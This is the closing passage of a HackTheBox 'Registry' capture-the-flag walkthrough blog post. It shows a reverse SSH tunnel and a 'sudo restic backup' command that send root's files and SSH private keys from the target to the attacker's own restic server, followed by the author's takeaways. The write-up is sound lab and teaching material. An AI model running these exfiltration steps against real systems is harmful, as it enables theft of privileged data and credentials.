highlighter-rouge">restic init --repo ~/HTB/registry/restic</code>. Second, run the service against the repo with <code class="language-plaintext highlighter-rouge">rest-server --path ~/HTB/registry/restic --listen localhost:5678</code>. If we try to run <code class="language-plaintext highlighter-rouge">rest-server</code> before initializing the repo, it returns fatal errors.</p><h2 id="send-data-back-to-the-local-restic-server"><span class="mr-2">Send data back to the local restic server</span><a href="#send-data-back-to-the-local-restic-server" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Trying to use any kind of reverse connection from this box will fail if trying it normally because there is a block on outgoing connections. To get around that, use a SSH Reverse Port Forwarding Tunnel. We can use the command <code class="language-plaintext highlighter-rouge">ssh -R 4455:localhost:5678 bolt@registry.htb</code> to set it up.</p><p>We can exfiltrate data with root permissions by using the <code class="language-plaintext highlighter-rouge">sudo restic</code> command. To exploit the command from the webshell, run <code class="language-plaintext highlighter-rouge">sudo /usr/bin/restic backup -r rest:http://localhost:4455/ -p /tmp/tmpf /root/root.txt</code>. What that does is send the backup to the forwarded port 4455, which is running on localhost from perspective of the remote box. The <code class="language-plaintext highlighter-rouge">-p /tmp/tmpf</code> refers to a file containing the password used for the repository when it was initialized. The password file will need to be created before running this command.</p><h2 id="retrieving-the-data-from-the-restic-repo-for-the-win"><span class="mr-2">Retrieving the data from the restic repo FOR THE WIN!</span><a href="#retrieving-the-data-from-the-restic-repo-for-the-win" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>After that, we have to restore the data from the backup taken on the remote box to get the root flag. Use the command <code class="language-plaintext highlighter-rouge">restic -r rest:http://localhost:5678/ restore latest --target from-registry</code> to grab the root flag!</p><h2 id="alternative-ending-root-shell"><span class="mr-2">Alternative ending: root shell</span><a href="#alternative-ending-root-shell" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>Getting the root flag is nice, but popping root shells is nicer! To do that on this box, replace the <code class="language-plaintext highlighter-rouge">/root/root.txt</code> with just <code class="language-plaintext highlighter-rouge">/root/</code>. That way the backup will send the entire <code class="language-plaintext highlighter-rouge">root</code> home folder. Within the home folder, there is a <code class="language-plaintext highlighter-rouge">.ssh</code> folder with private keys!</p><p><a href="/assets/img/registry/2020-03-19_23h34_27.png"><img data-src="/assets/img/registry/2020-03-19_23h34_27.png" alt="Root SSH" data-proofer-ignore></a></p><h1 id="the-end"><strong>~The end~</strong></h1><h2 id="takeaways"><span class="mr-2">Takeaways</span><a href="#takeaways" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p>This was my first hard box, and I loved it. Up until that point I had been intending on learning more about Docker and how to exploit it for some time, and I’m really glad this gave me the opportunity to do so.</p><ol><li>Probably my most valuable takeaway from this box is that I can work with Docker containers now.<li>I’m also thankful for learning about the pretty cool backup program, Restic.<li>Bolt CMS isn’t something I expect to see again, but it was fun exploiting a CMS of any kind.<li>I also used sqlite3 to access a local database file for the first time, and that will certainly be helpful in future scenarios.<li>This was the first time I successfully used a REVERSE SSH port forward tunnel. I have used the regular kind before though.<li>For a standard tactic, I’ll be paying more attention to file modification dates in the future, since the point I became the most stuck in this box was when I needed to edit the main config file for Bolt CMS, and realizing that it reverted back <em>after</em> first being saved, was crucial.</ol><h2 id="references"><span class="mr-2">References</span><a href="#references" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>1. Docker API Reference
https://docs.docker.com/registry/spec/api/

2. CVE-2019-9185 File Rename RCE Vuln
https://vuln.whitesourcesoftware.com/vulnerability/CVE-2019-9185/

3. Set up a local Restic Repo
https://restic.readthedocs.io/en/latest/030_preparing_a_new_repo.html#rest-server

4. Set up a local Restic Server
https://github.com/restic/rest-server
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/walkthrough/'>Walkthrough</a>, <a href='/categories/hackthebox/'>HackTheBox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/docker/" class="post-tag no-text-decoration" >docker</a> <a href="/tags/linux/" class="post-tag no-text-decoration" >Linux</a> <a href="/tags/nginx/" class="post-tag no-text-decoration" >nginx</a> <a href="/tags/restic/" class="post-tag no-text-decoration" >restic</a> <a href="/tags/webshell/" class="post-tag no-text-decoration" >webshell</a> <a href="/tags/reverse-port-forward/" class="post-tag no-text-decoration" >reverse port forward</a> <a href="/tags/cve-2019-9185/" class="post-tag no-text-decoration" >CVE-2019-9185</a> <a href="/tags/anti-csrf/" class="post-tag no-text-decoration" >anti-csrf</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox: Registry - MegaWattSec&amp;url=https://megawattsec.com/posts/HackTheBox-Registry/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox: Registry - MegaWattSec&amp;u=https://megawattsec.com/posts/HackTheBox-Registry/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://megawattsec.com/posts/HackTheBox-Registry/&amp;text=HackTheBox: Registry - MegaWattSec" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/hackthebox-haystack/">HackTheBox: Haystack</a><li><a href="/posts/hackthebox-craft/">HackTheBox: Craft</a><li><a href="/posts/hackthebox-bastion/">HackTheBox: Bastion</a><li><a href="/posts/hackthebox-jarvis/">HackTheBox: Jarvis</a><li><a href="/posts/hackthebox-swagshop/">HackTheBox: SwagShop</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/mysql/">mysql</a> <a class="post-tag" href="/tags/perl/">perl</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/anti-csrf/">anti-csrf</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/cve-2019-9185/">CVE-2019-9185</a> <a class="post-tag" href="/tags/docker/">docker</a> <a class="post-tag" href="/tags/elasticsearch/">elasticsearch</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/hackthebox-haystack/"><div class="card-body"> <em class="timeago small" data-ts="1569939718" > 2019-10-01 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox: Haystack</h3><div class="text-muted small"><p> Scans Starting Nmap 7.80 ( &amp;lt;https://nmap.org&amp;gt; ) at 2019-10-01 09:16 EDT Nmap scan report for 10.10.10.115 Host is up, received user-set (0.24s latency). PORT STATE SERVICE REASON VERSIO...</p></div></div></a></div><div class="card"> <a href="/posts/hackthebox-craft/"><div class="card-body"> <em class="timeago small" data-ts="1575921294" > 2019-12-09 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox: Craft</h3><div class="text-muted small"><p> Recon and Scans NMAP Here is the output from Nmap, it shows several ports open. nmap -n -Pn -sC -sV -p- 10.10.10.110 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-02 19:58 EST Nmap scan r...</p></div></div></a></div><div class="card"> <a href="/posts/hackthebox-jarvis/"><div class="card-body"> <em class="timeago small" data-ts="1566223496" > 2019-08-19 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox: Jarvis</h3><div class="text-muted small"><p> Recon: The website isn’t bare, but most of the links found don’t actually go anywhere. The only page with anything really going on is ‘Rooms’, where you’ll find the links to the rooms are PHP re...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/SANS-Holiday-Hack-Challenge-2019/" class="btn btn-outline-primary" prompt="Older"><p>SANS Holiday Hack Challenge 2019</p></a> <span class="btn btn-outline-primary disabled" prompt="Newer"><p>-</p></span></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/megawattsec">Dustin</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/web/">web</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/mysql/">mysql</a> <a class="post-tag" href="/tags/perl/">perl</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/anti-csrf/">anti-csrf</a> <a class="post-tag" href="/tags/api/">api</a> <a class="post-tag" href="/tags/cve-2019-9185/">CVE-2019-9185</a> <a class="post-tag" href="/tags/docker/">docker</a> <a class="post-tag" href="/tags/elasticsearch/">elasticsearch</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
